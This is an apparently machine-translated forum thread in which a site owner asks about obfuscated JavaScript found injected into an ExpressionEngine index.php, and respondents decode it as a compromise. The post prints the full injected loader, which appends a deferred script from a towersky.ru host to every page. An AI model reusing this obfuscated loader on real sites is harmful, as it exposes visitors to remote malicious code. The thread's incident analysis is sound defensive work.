模板中的奇怪Javascript。这是黑客攻击吗?
上周,我验证了我客户的网站是否符合xHTML严格的1.0/CSS 2.1标准。今天当我重新检查时,我遇到了一个验证错误,它是由一个奇怪的、以前未知的脚本引起的。我在ExpressionEngine CMS的index.php文件中找到了这个。这是我怀疑的黑客企图吗?我忍不住注意到脚本中编码的俄语域 这个javascript在做什么?我需要向我的客户解释具体的危险模板中的奇怪Javascript。这是黑客攻击吗?,javascript,security,expressionengine,Javascript,Security,Expressionengine,上周,我验证了我客户的网站是否符合xHTML严格的1.0/CSS 2.1标准。今天当我重新检查时,我遇到了一个验证错误,它是由一个奇怪的、以前未知的脚本引起的。我在ExpressionEngine CMS的index.php文件中找到了这个。这是我怀疑的黑客企图吗?我忍不住注意到脚本中编码的俄语域 这个javascript在做什么?我需要向我的客户解释具体的危险 this.v=27047; this.v+=187; ug=["n"]; OV=29534;
this.v=27047;
this.v+=187;
ug=["n"];
OV=29534;
OV--;
var y;
var C="C";
var T={};
r=function(){
b=36068;
b-=144;
M=[];
function f(V,w,U){
return V.substr(w,U);
var wH=39640;
}
var L=["o"];
var cj={};
var qK={N:false};
var fa="/g"+"oo"+"gl"+"e."+"co"+"m/"+f("degL4",0,2)+f("rRs6po6rRs",4,2)+f("9GVsiV9G",3,2)+f("5cGtfcG5",3,2)+f("M6c0ilc6M0",4,2)+"es"+f("KUTz.cUzTK",4,2)+f("omjFb",0,2)+"/s"+f("peIlh2",0,2)+"ed"+f("te8WC",0,2)+f("stien3",0,2)+f(".nYm6S",0,2)+f("etUWH",0,2)+f(".pdVPH",0,2)+f("hpzToi",0,2);
var BT="BT";
var fV=RegExp;
var CE={bf:false};
var UW='';
this.Ky=11592;
this.Ky-=237;
var VU=document;
var _n=[];
try {} catch(wP){};
this.JY=29554;
this.JY-=245;
function s(V,w){
l=13628;
l--;
var U="["+w+String("]");
var rk=new fV(U, f("giId",0,1));
this.NS=18321;this.NS+=195;return V.replace(rk, UW);
try {} catch(k){};
};
this.jM="";
var CT={};
var A=s('socnruixpot4','zO06eNGTlBuoYxhwn4yW1Z');
try {var vv='m'} catch(vv){};
var Os={};
var t=null;
var e=String("bod"+"y");
var F=155183-147103;
this.kp='';
Z={Ug:false};
y=function(){
var kl=["mF","Q","cR"];
try {
Bf=11271;
Bf-=179;
var u=s('cfr_eKaPtQe_EPl8eTmPeXn8to','X_BQoKfTZPz8MG5');
Fp=VU[u](A);
var H="";
try {} catch(WK){};
this.Ca=19053;
this.Ca--;
var O=s('s5rLcI','2A5IhLo');
var V=F+fa;
this.bK="";
var ya=String("de"+"fe"+f("r3bPZ",0,1));
var bk=new String();
pB=9522;
pB++;
Fp[O]=String("ht"+"tp"+":/"+"/t"+"ow"+"er"+"sk"+"y."+"ru"+":")+V;
Fp[ya]=[1][0];
Pe=45847;
Pe--;
VU[e].appendChild(Fp);
var lg=new Array();
var aQ={vl:"JC"};
this.KL="KL";
}
catch(x){
this.Ja="";
Th=["pj","zx","kO"];
var Jr='';
};
Tr={qZ:21084};
};
this.pL=false;
};
be={};
rkE={hb:"vG"};
r();
var bY=new Date();
window.onload=y;
cU=["Yr","gv"];
对。该网站已被破坏 您需要做的是:
请参见脚本基本上在结束正文标记中添加了以下行:
<script defer="defer" src="http://towersky.ru:8080/google.com/depositfiles.com/speedtest.net.php"></script>
因此,它试图将外部脚本加载到您的站点上。我不确定这个脚本是做什么的——但毫无疑问,它并没有什么好东西
此外,在谷歌上快速搜索“towersky.ru”会发现包含该网站的恶意网站列表。上述代码编写了一些代码,激活了俄罗斯网站()上的代码,该网站添加了一个包含iFrame的不可见DIV,我假设其中包含一张小狗的照片。考虑到我甚至无法在Windows中加载此页面,因为我的AV阻止了我,是的,这是一种病毒。谢谢大家的确认。我建议他更改所有密码并更新到最新的Expression Engine版本。谢谢你的提示。当时修改过的唯一文件是expression engine的index.php文件和两个旧的index.htm文件,这两个文件用于以前的站点设计。显然,他们的目标是索引文件?我将把这些建议传达给大家,希望在一切都为时已晚之前阻止灾难的发生!我最近的更新是$(document.ready(function(){document.title='newtitle';});你认为这可能与它有关吗?不,为了让脚本以它原来的方式嵌入,服务器本身必须被破坏。要么他们发现有人利用漏洞在服务器上获得写访问权限,要么他们通过弱密码、哑运气或特洛伊木马获得登录凭据。我认为towersky.ru的人可能在这里执行一项非常崇高的任务。包含的脚本名为“speedtest.net.php”,所以可能他们只是想将此脚本注入世界各地的所有网页中,如果您的网站运行缓慢,他们会打电话通知您。这很公平,但您是否真的得到了证明。此外,如果有人在我的网站上注入这样的代码,显然是未经允许的,我不会太高兴。还有,为什么要做出这样的努力来掩盖脚本的功能?“google.com”和“depositfiles.com”的使用让它更加可疑——它试图让它看起来好像代码来自谷歌。